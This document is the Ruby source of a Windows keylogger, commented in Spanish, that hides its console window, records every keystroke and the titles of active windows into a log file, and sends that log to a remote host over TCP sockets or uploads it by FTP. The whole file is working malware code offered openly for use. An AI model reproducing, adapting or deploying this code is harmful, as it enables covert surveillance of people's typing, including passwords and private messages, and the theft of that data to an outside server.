# Ruby Keylogger. # Si se descomenta se puede activar el envio por sockets. # # Queda pendiente para siguientes versiones: # - GUI para cliente # -Solucionar simbolos y borrar y esas cosas...xD # # #Coded by pRotos: protos.nu@gmail.com class Keylogger require 'Win32API' def intialize(host=:caca, port=:caca, ftphost=:caca, ftpuser=:caca, ftppass=:caca) @host = host @port = port @ftphost = ftphost @ftpuser = ftpuser @ftppass = ftppass end def esconder win = Win32API.new('kernel32' , 'GetConsoleWindow' , [] , 'L').call Win32API.new( 'user32' , 'ShowWindow' , ['p' , 'i'] , 'i' ).call(win, 0) end def key teclas = Hash.new (32 .. 128).each { |x| teclas[x.chr] = x } pulsacion = Win32API.new('user32', 'GetAsyncKeyState', ['i'], 'i') while 1 teclas.each { |x, y| if pulsacion.call(13) & 0x01 == 1 f = File.open('log.txt', 'a') f.print "\n" f.close end if pulsacion.call(8) & 0x01 == 1 f = File.open('log.txt', 'a') f.print "[borra]" f.close end if pulsacion.call(y) & 0x01 == 1 f = File.open('log.txt', 'a') f.print x f.close end } end end def ventana while 1 a = Win32API.new('user32', 'GetForegroundWindow', [], 'N').Call() sleep 1 b = Win32API.new('user32', 'GetForegroundWindow', [], 'N').Call() if a != b f = File.open('log.txt', 'a') title = ' '*256 win = Win32API.new('user32', 'GetWindowText', ['L', 'P', 'I'], 'I').Call(b, title, 256) title = title.gsub( / +/, '') f.print "[#{title}]\n" f.close end end end def ftp require 'net/ftp' ftp = Net::FTP.new(@ftphost) ftp.login(@ftpuser, @ftppass) ftp.put('log.txt') end def send if @host != 'caca' require 'socket' f = File.open('log.txt', 'r+') sock = TCPSocket.new(@host, @port) f.each_line do |line| sock.puts line end else return false end end def conn if @host != 'caca' require 'socket' begin sock = TCPSocket.new(@host, @port) return true rescue return false end else return false end end def run a = Thread.new { key } b = Thread.new { ventana } c = Thread.new { while res = conn if res == true send end end } a.join b.join c.join end end key = Keylogger.new key.esconder key.run